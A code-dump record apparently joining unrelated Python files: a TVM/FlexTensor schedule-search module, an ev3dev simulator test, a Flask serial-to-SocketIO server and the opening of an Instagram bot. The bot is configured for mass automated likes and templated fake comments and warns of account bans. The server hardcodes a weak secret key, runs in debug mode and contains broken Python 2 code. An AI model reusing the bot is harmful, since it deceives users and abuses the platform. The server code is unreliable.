assert_print(len(config["spatial"]) == len(spatial_axes), "align failed")
for axis, nparts in zip(spatial_axes, config["spatial"]):
nfactors = [1]
count = len(nparts) - 1
while count >= 0:
nfactors.append(nparts[count] * nfactors[-1])
count -= 1
tmp_buffer = []
num_factors = len(nfactors)
for i in range(num_factors - 2):
factor = nfactors[num_factors - 2 - i]
part = nparts[i]
if factor == 1:
tmp_buffer.append(axis)
axis = None
elif part == 1:
tmp_buffer.append(None)
else:
outer, axis = s[write_cache].split(axis, factor=factor)
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_spatial_axes.append(tmp_buffer)
else:
for axis in spatial_axes:
splited_spatial_axes.append([axis])
assert_print(len(splited_spatial_axes) > 0, "empty spatial axes") # must be non-empty
# reduce_split for write cache
reduced_axes = s[write_cache].op.reduce_axis
num_reduce_axes = len(reduced_axes)
splited_reduced_axes = []
if "reduce" in config and len(config["reduce"]) > 0:
# to align each axis
assert_print(len(config["reduce"]) == len(reduced_axes), "align reduce failed")
for axis, nparts in zip(reduced_axes, config["reduce"]):
nfactors = [1]
count = len(nparts) - 1
while count >= 0:
nfactors.append(nparts[count] * nfactors[-1])
count -= 1
tmp_buffer = []
num_factors = len(nfactors)
for i in range(num_factors - 2):
factor = nfactors[num_factors - 2 - i]
part = nparts[i]
if factor == 1:
tmp_buffer.append(axis)
axis = None
elif part == 1:
tmp_buffer.append(None)
else:
outer, axis = s[write_cache].split(axis, factor=factor)
tmp_buffer.append(outer)
tmp_buffer.append(axis)
splited_reduced_axes.append(tmp_buffer)
else:
for axis in reduced_axes:
splited_reduced_axes.append([axis])
# for easy align
reduce_split_num_parts = len(splited_reduced_axes[0])
assert reduce_split_num_parts == spatial_split_num_parts
# reorder hybrid for spatial and reduce
hybrid_axes = splited_spatial_axes + splited_reduced_axes
hybrid_fuse_lsts = []
hybrid_reorder_lst = []
for count in range(spatial_split_num_parts):
tmp_buffer = [x[count] for x in hybrid_axes]
hybrid_fuse_lsts.append(tmp_buffer)
hybrid_reorder_lst.extend(tmp_buffer)
if len(hybrid_fuse_lsts) > 1:
last_parts = hybrid_reorder_lst[-num_spatial_axes - num_reduce_axes:]
hybrid_reorder_lst = hybrid_reorder_lst[:-num_spatial_axes - num_reduce_axes]
tmp_buffer = last_parts[-num_reduce_axes:]
tmp_buffer.extend(last_parts[:-num_reduce_axes])
hybrid_reorder_lst.extend(tmp_buffer)
hybrid_reorder_lst_without_none = list(filter(lambda x: x is not None, hybrid_reorder_lst))
# print("reorder cache write", hybrid_reorder_lst_without_none)
s[write_cache].reorder(*hybrid_reorder_lst_without_none)
# fuse without reduce axes
# assert len(hybrid_fuse_lsts) > 0
# s[write_cache].fuse(*hybrid_fuse_lsts[0][:-num_reduce_axes])
# unroll and vectorize without reduce axes
if len(hybrid_fuse_lsts) > 1:
rcount = num_spatial_axes - 1
while config["spatial"][rcount][-1] == 1:
rcount -= 1
if rcount >= 0:
# print("vectorize cache write", hybrid_fuse_lsts[-1][rcount])
s[write_cache].vectorize(hybrid_fuse_lsts[-1][rcount])
for count in range(rcount):
if config["spatial"][count][-1] > 1:
# print("unroll cache write", hybrid_fuse_lsts[-1][count])
s[write_cache].unroll(hybrid_fuse_lsts[-1][count])
if len(hybrid_fuse_lsts) > 2:
for count in range(num_spatial_axes):
if config["spatial"][count][-2] > 1:
# print("unroll cache write", hybrid_fuse_lsts[-2][count])
s[write_cache].unroll(hybrid_fuse_lsts[-2][count])
# for count in range(num_reduce_axes):
# if config["reduce"][count][-2] > 1:
# print("unroll cache write", hybrid_fuse_lsts[-2][count + num_spatial_axes])
# s[write_cache].unroll(hybrid_fuse_lsts[-2][count + num_spatial_axes])
def _micro_schedule_simple(s, op, op_state):
# prepare extents
sp_extents = [to_int(x.dom.extent) for x in op.axis]
if hasattr(op, "reduce_axis"):
re_extents = [to_int(x.dom.extent) for x in op.reduce_axis]
else:
re_extents = []
INTRIN_TABLE = get_intrin_table()
if "intrin" in config:
target, ind, slist, rlist = config["intrin"][0]
intrin = INTRIN_TABLE[target][ind]
else:
intrin = None
s_list = []
r_list = []
sp_factors = []
re_factors = []
# spatial split
if "spatial" in config:
sub_sp_axis_list = []
for axis, f_list in zip(s[op].op.axis, config["spatial"]):
split_list = []
for factor in f_list[:-1]:
outer, axis = s[op].split(axis, nparts=factor)
split_list.append(outer)
sp_factors.append(f_list[-1])
split_list.append(axis)
sub_sp_axis_list.append(split_list)
else:
sub_sp_axis_list = [[axis] for axis in s[op].op.axis]
sp_factors = sp_extents
# reduce split
if "reduce" in config and hasattr(op, "reduce_axis"):
sub_re_axis_list = []
for axis, f_list in zip(s[op].op.reduce_axis, config["reduce"]):
split_list = []
for factor in f_list[:-1]:
outer, axis = s[op].split(axis, nparts=factor)
split_list.append(outer)
re_factors.append(f_list[-1])
split_list.append(axis)
sub_re_axis_list.append(split_list)
elif hasattr(op, "reduce_axis"):
sub_re_axis_list = [[axis] for axis in s[op].op.reduce_axis]
re_factors = re_extents
else:
sub_re_axis_list = []
# match intrinsic
def rearrange(lst):
return list(zip(*lst))
sub_sp_axis_list = rearrange(sub_sp_axis_list)
sub_re_axis_list = rearrange(sub_re_axis_list)
num_sp = len(sub_sp_axis_list) - 1
num_re = len(sub_re_axis_list) - 1
# inner-most
inner_most = [sub_sp_axis_list[num_sp]]
if num_re >= 0:
inner_most.append(sub_re_axis_list[num_re])
# do intrinsic
if intrin is not None:
visit_sp = [False for x in inner_most[0]]
if num_re >= 0:
visit_re = [False for x in inner_most[1]]
else:
visit_re = []
intrin_sp_list = []
intrin_re_list = []
intrin_sp_extents = []
intrin_re_extents = []
intrin_sp_factors = []
intrin_re_factors = []
for ind in slist:
intrin_sp_list.append(inner_most[0][ind])
visit_sp[ind] = True
intrin_sp_extents.append(sp_extents[ind])
intrin_sp_factors.append(sp_factors[ind])
for ind in rlist:
intrin_re_list.append(inner_most[1][ind])
visit_re[ind] = True
intrin_re_extents.append(re_extents[ind])
intrin_re_factors.append(re_factors[ind])
left_sp_axis_list = []
for i, val in enumerate(visit_sp):
if not val:
left_sp_axis_list.append(inner_most[0][i])
left_re_axis_list = []
for i, val in enumerate(visit_re):
if not val:
left_re_axis_list.append(inner_most[1][i])
# reorder
# spatial must before reduce
to_reorder = []
for parts in sub_sp_axis_list[:-1]:
to_reorder.extend(parts)
to_reorder.extend(left_sp_axis_list)
for parts in sub_re_axis_list[:-1]:
to_reorder.extend(parts)
to_reorder.extend(left_re_axis_list)
to_reorder.extend(intrin_sp_list)
to_reorder.extend(intrin_re_list)
s[op].reorder(*to_reorder)
# tensorize
intrinsic = intrin.intrin(*(
intrin_sp_extents +
intrin_re_extents +
intrin_sp_factors +
intrin_re_factors +
intrin_sp_list +
intrin_re_list))
s[op].tensorize(intrin_sp_list[0], intrinsic)
# do fence
s[op].pragma(to_reorder[0], "epilogue", "do_fence")
else:
to_reorder = []
while num_sp >= 0 and num_re >= 0:
to_reorder.append(sub_sp_axis_list[num_sp] + sub_re_axis_list[num_re])
num_sp -= 1
num_re -= 1
while num_sp >= 0:
to_reorder.append(sub_sp_axis_list[num_sp])
num_sp -= 1
while num_re >= 0:
to_reorder.append(sub_re_axis_list[num_re])
num_re -= 1
to_reorder = reduce(lambda x, y: x + y, reversed(to_reorder), [])
s[op].reorder(*to_reorder)
def _micro_schedule_split_reorder(s, op, op_state):
sp_exts = [int(x.dom.extent) for x in op.axis]
re_exts = [int(x.dom.extent) for x in op.reduce_axis]
intrin = None
sp_intrin_idx_lst, re_intrin_idx_lst = [], []
INTRIN_TABLE = get_intrin_table()
if "intrin" in config:
target, ind, sp_intrin_idx_lst, re_intrin_idx_lst = config["intrin"][0]
intrin = INTRIN_TABLE[target][ind]
def gen_split(cfg_key, axes):
sub_axes = []
inner_exts = []
if cfg_key in config and len(config[cfg_key]) > 0:
for i, (axis, factors) in enumerate(zip(axes, config[cfg_key])):
splits = []
for f in factors[:-1]:
outer, axis = s[op].split(axis, nparts=f)
splits.append(outer)
splits.append(axis)
inner_exts.append(factors[-1])
sub_axes.append(splits)
else:
sub_axes = [[x] for x in axes]
inner_exts = [[x.dom.extent] for x in axes]
return sub_axes, inner_exts
def partition(sub_axes, intrin_idx_lst):
outer_axes, intrin_axes = [], []
for i, axes in enumerate(sub_axes):
if i in intrin_idx_lst:
outer_axes.extend(axes[:-1])
intrin_axes.append(axes[-1])
else:
outer_axes.extend(axes)
return outer_axes, intrin_axes
sp_sub_axes, sp_inner_exts = gen_split("spatial", s[op].op.axis)
re_sub_axes, re_inner_exts = gen_split("reduce", s[op].op.reduce_axis)
sp_outer_axes, sp_intrin_axes = partition(sp_sub_axes, sp_intrin_idx_lst)
re_outer_axes, re_intrin_axes = partition(re_sub_axes, re_intrin_idx_lst)
outer_axes = sp_outer_axes + re_outer_axes
intrin_axes = sp_intrin_axes + re_intrin_axes
if "reorder" in config and len(config["reorder"]) > 0:
shift_step = config["reorder"][0][0]
assert shift_step < len(outer_axes)
outer_axes = shift(sp_outer_axes, re_outer_axes, shift_step)
s[op].reorder(*outer_axes, *intrin_axes)
intrinsic = intrin.intrin(
*[sp_exts[i] for i in sp_intrin_idx_lst],
*[re_exts[i] for i in re_intrin_idx_lst],
*[sp_inner_exts[i] for i in sp_intrin_idx_lst],
*[re_inner_exts[i] for i in re_intrin_idx_lst],
*[sp_outer_axes[i] for i in sp_intrin_idx_lst],
*[re_outer_axes[i] for i in re_intrin_idx_lst]
)
s[op].tensorize(intrin_axes[0], intrinsic)
s[op].pragma(outer_axes[0], "epilogue", "do_fence")
if target == "cuda":
# if hint == "split_fuse":
# print(hint)
# return _cuda_schedule_split_fuse
# elif hint == "fuse_split":
# print(hint)
# return _cuda_schedule_fuse_split
# else:
# raise RuntimeError("Unknown hint: %s" % hint)
return _cuda_schedule_split_reorder_fuse
elif target == "llvm":
return _cpu_schedule_simple
elif target == "micro":
# return _micro_schedule_simple
return _micro_schedule_split_reorder
else:
raise RuntimeError("Currently no support for target %s" % target)
class Rewriter(object):
def __init__(self, configs):
self.graph_config = configs.graph_config
self.op_config_lst = configs.op_config_lst
def rewrite(self, task):
"""
this is a hard code manner,
we don't know how to generalize this change
because it even need compute rewrite and schedule rewrite
"""
assert task.target == "llvm", "Only rewrite for CPU"
assert task.category == "conv2d"
# schedule rewrite
import copy
new_graph_config = copy.deepcopy(self.graph_config)
new_op_config_lst = copy.deepcopy(self.op_config_lst)
# must compute inline as original config may split channel differently
new_graph_config["inline"] = [[1, 0]]
# fetch conv config
conv_config = self.op_config_lst[1]
new_config = new_op_config_lst[1]
# change out_channel config
vlen1 = conv_config["reduce"][0][-1]
vlen2 = conv_config["spatial"][1][-1]
new_config["spatial"].append([1] * len(new_config["spatial"][0]))
new_config["spatial"][-1][-1] = vlen2
new_config["spatial"][1][-1] = 1
new_config["reduce"][0][-1] = 1
new_config["reduce"].insert(1, [1] * len(new_config["reduce"][0]))
new_config["reduce"][1][-1] = vlen1
# compute rewrite
from flextensor.task import conv2d_nchwc_layout
kwargs = {"vlen1": vlen1, "vlen2": vlen2}
ops, bufs = conv2d_nchwc_layout(*task.args, **kwargs)
return ops, bufs, new_graph_config, new_op_config_lst
class GraphScheduler(Scheduler):
def __init__(self, task_key, space, decay=0.7, parallel=10, timeout=4.0, trial=100, number=1, early_stop=30,
rpc_info=None, rewrite=False):
super(GraphScheduler, self).__init__("graph", task_key, space, parallel, timeout, trial, number, early_stop,
rpc_info, rewrite=rewrite)
def schedule(self, configs, method="searching", use_model=False, perf_path=None):
if perf_path is not None:
self.walker_group.model_path = perf_path
if method == "searching":
return self._searching_schedule(configs, ["inline", "merge"], use_model=use_model)
elif method == "q":
return self._q_schedule(configs, ["inline", "merge"], use_model=use_model)
elif method == "random":
return self._random_schedule(configs, ["inline", "merge"], use_model=use_model)
else:
raise RuntimeError("Currently no support for method %s" % method)
def parallel_evaluate(self, configs, graph_configs, number=1):
return self._parallel_evaluate(configs, graph_configs, mode="graph", number=number)
@staticmethod
def generate_graph_schedule(config, phase="inline"):
def _inline_schedule(s, op_lst, op_states):
if "inline" in config and len(config["inline"]) > 0:
entity = config["inline"][0]
for count in range(len(op_lst)):
if entity[count]:
s[op_lst[count]].compute_inline()
op_states[count].inline = True
def _at_schedule(s, op_lst, op_states):
return
if "merge" in config and len(config["merge"]) > 0:
entity = config["merge"][0]
for count in range(len(op_lst)):
if entity[count] >= 0:
num_consumers = len(op_states[count].consumer_lst)
if num_consumers != 1 or op_states[count].inline:
continue
else:
consumer_id = op_states[count].consumer_lst[0]
consumer_state = op_states[consumer_id]
if consumer_state.inline:
continue # do not compute at inlined ops
consumer_loop_idx = consumer_state.loop_idx
at_pos = consumer_state.loop_lst[consumer_loop_idx[entity[count]]]
s[op_lst[count]].compute_at(s[op_lst[consumer_id]], at_pos)
op_states[count].compute_at = True
if phase == "inline":
return _inline_schedule
elif phase == "at":
return _at_schedule
else:
raise RuntimeError("Currently no support for phase %s" % phase)
class SerialResult(object):
def __init__(self, res):
self.res = res
def get(self, timeout=1):
return self.res
class Result(object):
def __init__(self, p, q):
self.p = p
self.q = q
def get(self, timeout=1):
# beg = time.time()
# while time.time() - beg < timeout:
# if self.q.empty():
# time.sleep(.1)
# else:
# break
try:
# print("getting...")
# while self.q.empty():
# pass
# print("queue is empty? ", self.q.empty())
res = self.q.get(block=True, timeout=timeout)
# print("done")
# while not self.q.empty():
# _ = self.q.get(block=True)
except Exception as e:
# print(e.__class__)
res = RuntimeError(str(e))
if self.p.is_alive():
kill_child_processes(self.p.pid)
self.p.terminate()
self.p.join()
self.q.close()
# print("queue joining...")
self.q.join_thread()
# print("queue joined")
del self.p
del self.q
return res
class OpState(object):
def __init__(self):
self.inline = False
self.loop_lst = []
self.loop_idx = []
self.compute_at = False
self.consumer_lst = []
def schedule(task_key, slevel=4, rlevel=3, op_trial=50, graph_trial=10, op_stop=15, graph_stop=5,
number=1, timeout=5.0, parallel=8, method="searching", re_evalutate_number=10, warm_up_epoch=20, warm_up_number=20, **kwargs,):
"""Schedule a task
perform sequential schedule
"""
task = TASK_TABLE[task_key]
func = task.func
args = task.args
ops, bufs = func(*args)
# sort the ops, so that we can distinguish each op
op_lst, down_graph = flatten_graph(ops)
# state of ops
op_states = [OpState() for _ in op_lst]
for count_op, op in enumerate(op_lst):
consumer_lst = []
for count_output in range(op.num_outputs):
if op.output(count_output) in down_graph:
consumer_lst.extend(down_graph[op.output(count_output)])
op_states[count_op].consumer_lst = list(set(consumer_lst))
if "trials" in kwargs:
assert_print(len(kwargs["trials"]) == len(op_lst), str(len(op_lst)))
force_trials = kwargs["trials"]
else:
force_trials = [op_trial for i in range(len(op_lst))]
op_perf_model_path_lst = [None for i in range(len(op_lst))]
if "op_perf_model_path" in kwargs:
for (op_pos, path) in kwargs["op_perf_model_path"]:
op_perf_model_path_lst[op_pos] = path
graph_perf_model_path = None
if "graph_perf_model_path" in kwargs:
graph_perf_model_path = kwargs["graph_perf_model_path"]
force_inline = False
if "force_inline" in kwargs:
force_inline = kwargs["force_inline"]
if "rewrite" in kwargs:
rewrite = True
# must force_inline
force_inline = True
else:
rewrite = False
rpc_info = None
if "rpc_info" in kwargs:
rpc_info = kwargs["rpc_info"]
model_measurer = None
if "model_measurer" in kwargs:
model_measurer = kwargs["model_measurer"]
##################################################
# first generate graph space
if task.target == "cuda" or task.target == "llvm":
schedule_graph = True
graph_space = generate_space_inter_op(
op_lst, down_graph, force_inline=force_inline, special_space=task.special_space)
elif task.target == "micro":
schedule_graph = False
graph_space = generate_empty_space_inter_op()
else:
raise RuntimeError("Currently no support for target %s" % task.target)
graph_space_size = len(graph_space)
#print("graph space size", graph_space_size)
total_size = graph_space_size
##################################################
# intra operations schedule decisionss
op_space_lst = []
if force_inline and "inline" in graph_space.subspaces:
configs = Config([], {"inline": [graph_space.subspaces["inline"].static_entities[0]]})
else:
configs = Config([], None)
for pos, op in enumerate(op_lst):
if task.target == "cuda":
space = generate_space_intra_op(op, down_graph, slevel=slevel, rlevel=rlevel, groups=3)
elif task.target == "llvm":
rslevel = max(slevel, rlevel)
space = generate_space_intra_op(op, down_graph, slevel=rslevel, rlevel=rslevel,
unroll_policy="off", fuse_policy="off",
reorder_policy="off")
elif task.target == "micro":
space = generate_op_space_with_intrin(op, rpc_info.target)
else:
raise RuntimeError("Currently no support for target %s" % task.target)
total_size *= len(space)
#print("op", pos, "space size:", len(space))
op_space_lst.append(space)
op_scheduler = OpScheduler(
task_key,
pos,
space,
parallel=parallel,
timeout=timeout,
trial=force_trials[pos],
number=number,
early_stop=op_stop,
rpc_info=rpc_info,
rewrite=rewrite,
model_measurer=model_measurer,
re_evalutate_number=re_evalutate_number,
warm_up_epoch=warm_up_epoch,
warm_up_number=warm_up_number
)
# print("###########################################")
# print("Scheduling", op)
use_model = False if op_perf_model_path_lst[pos] is None else True
perf_path = op_perf_model_path_lst[pos]
if force_inline and "inline" in graph_space.subspaces \
and graph_space.subspaces["inline"].able_inline(pos):
op_config = {}
else:
op_config = op_scheduler.schedule(
configs,
method=method,
use_model=use_model,
perf_path=perf_path,
)
configs.op_config_lst.append(op_config)
#print("space size", total_size)
#################################################
# inter operations schedule decisions
if schedule_graph:
graph_scheduler = GraphScheduler(
task_key,
graph_space,
parallel=parallel,
timeout=timeout,
trial=graph_trial,
number=number,
early_stop=graph_stop,
rpc_info=rpc_info,
rewrite=rewrite
)
use_model = False if graph_perf_model_path is None else True
if len(graph_space) > 1:
graph_config = graph_scheduler.schedule(
configs, method=method, use_model=use_model, perf_path=graph_perf_model_path)
else:
graph_config = {}
else:
graph_config = {}
#################################################
# combine the configs
configs = Config(configs.op_config_lst, graph_config)
if (not configs.op_config_lst) or (not configs.op_config_lst[0]["intrin"]) : # cannot find a schedule for the hardware design point
print("Cannot find valid schedules")
return None, None, None
#################################################
# final schedule
# s = tvm.create_schedule(ops)
# # perform inter operator schedule
# graph_template = GraphScheduler.generate_graph_schedule(configs.graph_config, phase="inline")
# graph_template(s, op_lst, op_states)
# # perform intra-operator schedule
# for count_op, (op, op_state, op_config) in enumerate(zip(op_lst, op_states, configs.op_config_lst)):
# if not op_state.inline:
# op_template = OpScheduler.generate_op_schedule(task.target, op_config)
# op_template(s, op, op_states[count_op])
# # perform inter operations schedule again for compute at
# if graph_config is not None:
# graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="at")
# graph_template(s, op_lst, op_states)
s, bufs = schedule_with_config(task_key, configs, rewrite=rewrite)
return s, bufs, configs
def schedule_with_config(task_key, configs, op_pos=None, rewrite=False):
"""Schedule a task with given configs
perform sequential schedule
"""
task = TASK_TABLE[task_key]
rewriter = Rewriter(configs)
if rewrite:
ops, bufs, new_graph_config, new_op_config_lst = rewriter.rewrite(task)
configs = Config(new_op_config_lst, new_graph_config)
else:
func = task.func
args = task.args
ops, bufs = func(*args)
s, bufs = schedule_with_config_ops(ops, bufs, configs, op_pos=op_pos, target=task.target)
return s, bufs
def schedule_with_config_ops(ops, bufs, configs, op_pos=None, target="llvm"):
"""Schedule a task with given configs
perform sequential schedule
"""
# sort the ops, so that we can distinguish each op
op_lst, down_graph = flatten_graph(ops)
# state of ops
op_states = [OpState() for op in op_lst]
for count_op, op in enumerate(op_lst):
consumer_lst = []
for count_output in range(op.num_outputs):
if op.output(count_output) in down_graph:
consumer_lst.extend(down_graph[op.output(count_output)])
op_states[count_op].consumer_lst = list(set(consumer_lst))
op_config_lst = configs.op_config_lst
if op_pos is not None:
assert_print(isinstance(op_pos, int), "op_pos should be int")
assert_print(op_pos < len(op_lst) and op_pos < len(op_config_lst), "op_pos too big")
loop_length = op_pos + 1
s = tvm.create_schedule(op_lst[op_pos])
else:
assert_print(len(op_config_lst) <= len(op_lst), "config length exceed op_lst")
loop_length = len(op_config_lst)
s = tvm.create_schedule(ops)
###################################################
# perform inter operations schedule first for inline
graph_config = configs.graph_config
if graph_config is not None:
graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="inline")
graph_template(s, op_lst, op_states)
###################################################
# perform intra operations schedule
for i in range(loop_length):
# mask inlined ops
if not op_states[i].inline:
op = op_lst[i]
config = op_config_lst[i]
template = OpScheduler.generate_op_schedule(target, config)
template(s, op, op_states[i])
###################################################
# perform inter operations schedule again for compute at
if graph_config is not None:
graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="at")
graph_template(s, op_lst, op_states)
return s, bufs
def schedule_ops_with_config(s, op_lst, configs, target):
"""
Schedule op list with given configs
This assumes a previous graph optimizaton
so there is no need to retrieve graph list
nor perform compute_at
"""
# state of ops
op_states = [OpState() for op in op_lst]
op_config_lst = configs.op_config_lst
loop_length = len(op_config_lst)
###################################################
# perform inter operations schedule first for inline
graph_config = configs.graph_config
if graph_config is not None:
graph_template = GraphScheduler.generate_graph_schedule(graph_config, phase="inline")
graph_template(s, op_lst, op_states)
###################################################
# perform intra operations schedule
for i in range(loop_length):
# mask inlined ops
if not op_states[i].inline:
op = op_lst[i]
config = op_config_lst[i]
template = OpScheduler.generate_op_schedule(target, config)
template(s, op, op_states[i])
return s
|
sensor_integration_test.py
|
import os
import sys
import threading
import unittest
from multiprocessing import Process
from time import sleep
from unittest.mock import patch
from ev3dev2.sensor.lego import UltrasonicSensor, ColorSensor, TouchSensor
from ev3dev2.unit import STUD_MM
from ev3dev2.wheel import EV3EducationSetTire
from ev3dev2.motor import OUTPUT_A, OUTPUT_D, MoveDifferential, MoveTank, SpeedPercent, follow_for_ms
from ev3dev2._platform.ev3 import INPUT_1, INPUT_2, INPUT_3, INPUT_4
from ev3dev2simulator import __main__
import ev3dev2simulator.connection.ClientSocket as cs
class TestConfig(unittest.TestCase):
def test_color_and_us_sensor_downwards(self):
test_args = ["program", "-t", "config_large"]
with patch.object(sys, 'argv', test_args):
sim = Process(target=__main__.main, daemon=True)
sim.start()
cs.client_socket = None
sleep(5)
clm = ColorSensor(INPUT_2)
usb = UltrasonicSensor(INPUT_4)
usb.mode = "US-DIST-CM"
tank_drive = MoveDifferential(OUTPUT_A, OUTPUT_D, EV3EducationSetTire, 15 * STUD_MM)
self.assertEqual(clm.color, 1)
tank_drive.on_for_rotations(0, -55, 1)
tank_drive.on_for_rotations(10, 0, 0.2)
tank_drive.stop()
self.assertEqual(clm.color, 5)
tank_drive.turn_left(30, -40)
self.assertEqual(usb.value(), 20.0)
tank_drive.turn_left(30, 120)
self.assertEqual(usb.value(), 2550.0)
cs.client_socket.client.close()
sim.terminate()
def test_touch_and_us_sensor_forward(self):
test_args = ["program", "-t", "config_small"]
with patch.object(sys, 'argv', test_args):
sim = Process(target=__main__.main, daemon=True)
sim.start()
cs.client_socket = None
sleep(5)
ts1 = TouchSensor(INPUT_1)
usf = UltrasonicSensor(INPUT_3)
usf.mode = "US-DIST-CM"
tank_drive = MoveDifferential(OUTPUT_A, OUTPUT_D, EV3EducationSetTire, 15 * STUD_MM)
tank_drive.turn_right(30, 90)
self.assertEqual(ts1.is_pressed, 0)
sleep(0.2)
self.assertAlmostEqual(usf.value(), 810, delta=20)
val = usf.value()
print(val)
tank_drive.on_for_distance(50, 600)
self.assertAlmostEqual(val - 600, usf.value(), delta=20)
self.assertEqual(False, ts1.is_pressed)
sleep(3)
tank_drive.on_for_rotations(20, 0, 0.3)
self.assertEqual(True, ts1.is_pressed)
cs.client_socket.client.close()
sim.terminate()
def test_follow_line(self):
test_args = ["program", "-t", "config_small"]
with patch.object(sys, 'argv', test_args):
sim = Process(target=__main__.main, daemon=True)
sim.start()
cs.client_socket = None
sleep(9)
from ev3dev2.sensor.lego import ColorSensor
tank = MoveTank(OUTPUT_A, OUTPUT_D)
tank.cs = ColorSensor(INPUT_2)
try:
# Follow the line for 4500ms
tank.follow_line(
kp=11.3/4, ki=0.05/4, kd=3./4,
speed=SpeedPercent(10),
follow_for=follow_for_ms,
ms=14500,
target_light_intensity=50
)
except Exception:
tank.stop()
raise
if __name__ == '__main__':
unittest.main()
|
server.py
|
#main.py
from gevent import monkey
from random import *
monkey.patch_all()
import time
from threading import Thread
from flask import Flask, render_template, session, request
from flask_socketio import SocketIO, emit, join_room, disconnect
import serial
import random
from datetime import datetime
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
thread = None
#ser = serial.Serial('/dev/tty.usbserial-141',9600)
# ser = serial.Serial(
#
# port='/dev/tty.usbserial-1412',
# baudrate = 9600,
# # parity=serial.PARITY_NONE,
# # stopbits=serial.STOPBITS_ONE,
# # bytesize=serial.EIGHTBITS,
# # timeout=1
# )
#data1 = ser.readline();
def loop_forever():
#read_byte = ser.read(2)
socketio.emit('message', {'data': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
socketio.emit('message2', {'data2': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
while read_byte is not None:
#read_byte = ser.read(2)
socketio.emit('message', {'data': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
socketio.emit('message2', {'data2': 'This is data', 'time': read_byte.decode('ascii')}, namespace='/test')
print read_byte.decode("ascii")
def background_stuff():
""" python code in main.py """
print('In background_stuff')
random.seed(datetime.now())
ser = serial.Serial(port='/dev/tty.usbserial-1413',baudrate = 9600)
myList = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];
while True:
for z in range(0, 25):
data1 = ser.readline();
myList[z] = data1;
time.sleep(0.25);
y = str(randint(-10,10));
socketio.emit('message', {'data': 'This is data', 'time': myList}, namespace='/test')
# socketio.emit('message2', {'data2': 'This is data', 'time': x}, namespace='/test')
@app.route('/lib/<path:path>')
def send_js(path):
return app.send_static_file('lib/'+path)
@app.route('/styles/<path:path>')
def send_styles(path):
return app.send_static_file('styles/'+path)
@app.route('/')
def index():
global thread
if thread is None:
thread = Thread(target=background_stuff)
thread.start()
return app.send_static_file('index.html')
mqttThread = Thread(target=loop_forever)
mqttThread.start()
app.run()
# from flask import Flask, request
# # set the project root directory as the static folder, you can set others.
# app = Flask(__name__)
#
# @app.route('/')
# def root():
# return app.send_static_file('index.html')
# app.run()
#ser = serial.Serial(port='/dev/tty.usbserial-1412',baudrate = 9600)
#data1 = ser.readline();
#value = int(data1);
#counter = counter + 1;
# while (counter < 25):
# myList[counter] = data1;
# counter= counter+1;
#time.sleep(0.5)
#print("sleeping")
#t = str(randint(40,90))
#t = myList[counter];
#if counter == 6: counter = 0;
#for z in range(0, 24):
#data1 = ser.readline();
#x = str(randint(60,70));
#myList[z] = data1;
#socketio.emit('message', {'data': 'This is data', 'time': data1}, namespace='/test')
# for z in range(0, 4):
# data1 = ser.readline();
# socketio.emit('message', {'data2': 'This is data', 'time': data1}, namespace='/test')
|
fntxworld.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
from src import InstaBot
from src.check_status import check_status
from src.feed_scanner import feed_scanner
from src.follow_protocol import follow_protocol
from src.unfollow_protocol import unfollow_protocol
from multiprocessing import Process
from multiprocessing import Pool
def the_bot(id, passw):
bot = InstaBot(
login=id,
password=passw,
like_per_day=5000,
comments_per_day=0,
tag_list=['muaythai', 'Kickboxing', 'mma', 'fightnight', 'boxing', 'ufc', 'bellator', 'wwe', 'conormcgregor', 'thenotorious' 'fighting', 'hiphop', 'concert', 'musiclover', 'asaprocky', 'awge', 'rock', 'itslit', 'supreme', 'offwhite', 'grailed', 'fightclub', 'edmfamily'],
tag_blacklist=['rain', 'thunderstorm'],
user_blacklist={},
max_like_for_one_tag=3000,
follow_per_day=0,
follow_time=1 * 5,
unfollow_per_day=0,
unfollow_break_min=15,
unfollow_break_max=30,
log_mod=0,
proxy='',
# List of list of words, each of which will be used to generate comment
# For example: "This shot feels wow!"
comment_list=[["this", "the", "your"],
["photo", "picture", "pic", "shot", "snapshot"],
["is", "looks", "feels", "is really"],
["great", "super", "good", "very good", "good", "wow",
"WOW", "cool", "GREAT","magnificent", "magical",
"very cool", "stylish", "beautiful", "so beautiful",
"so stylish", "so professional", "lovely",
"so lovely", "very lovely", "glorious","so glorious",
"very glorious", "adorable", "excellent", "amazing"],
[".", "..", "...", "!", "!!", "!!!"]],
# Use unwanted_username_list to block usernames containing a string
## Will do partial matches; i.e. 'mozart' will block 'legend_mozart'
### 'free_followers' will be blocked because it contains 'free'
unwanted_username_list=[
'second', 'stuff', 'art', 'project', 'love', 'life', 'food', 'blog',
'free', 'keren', 'photo', 'graphy', 'indo', 'travel', 'art', 'shop',
'store', 'sex', 'toko', 'jual', 'online', 'murah', 'jam', 'kaos',
'case', 'baju', 'fashion', 'corp', 'tas', 'butik', 'grosir', 'karpet',
'sosis', 'salon', 'skin', 'care', 'cloth', 'tech', 'rental', 'kamera',
'beauty', 'express', 'kredit', 'collection', 'impor', 'preloved',
'follow', 'follower', 'gain', '.id', '_id', 'bags'
],
unfollow_whitelist=['example_user_1', 'example_user_2'])
while True:
#print("# MODE 0 = ORIGINAL MODE BY LEVPASHA")
#print("## MODE 1 = MODIFIED MODE BY KEMONG")
#print("### MODE 2 = ORIGINAL MODE + UNFOLLOW WHO DON'T FOLLOW BACK")
#print("#### MODE 3 = MODIFIED MODE : UNFOLLOW USERS WHO DON'T FOLLOW YOU BASED ON RECENT FEED")
#print("##### MODE 4 = MODIFIED MODE : FOLLOW USERS BASED ON RECENT FEED ONLY")
#print("###### MODE 5 = MODIFIED MODE : JUST UNFOLLOW EVERYBODY, EITHER YOUR FOLLOWER OR NOT")
################################
## WARNING ###
################################
# DON'T USE MODE 5 FOR A LONG PERIOD. YOU RISK YOUR ACCOUNT FROM GETTING BANNED
## USE MODE 5 IN BURST MODE, USE IT TO UNFOLLOW PEOPLE AS MANY AS YOU WANT IN SHORT TIME PERIOD
mode = 0
#print("You choose mode : %i" %(mode))
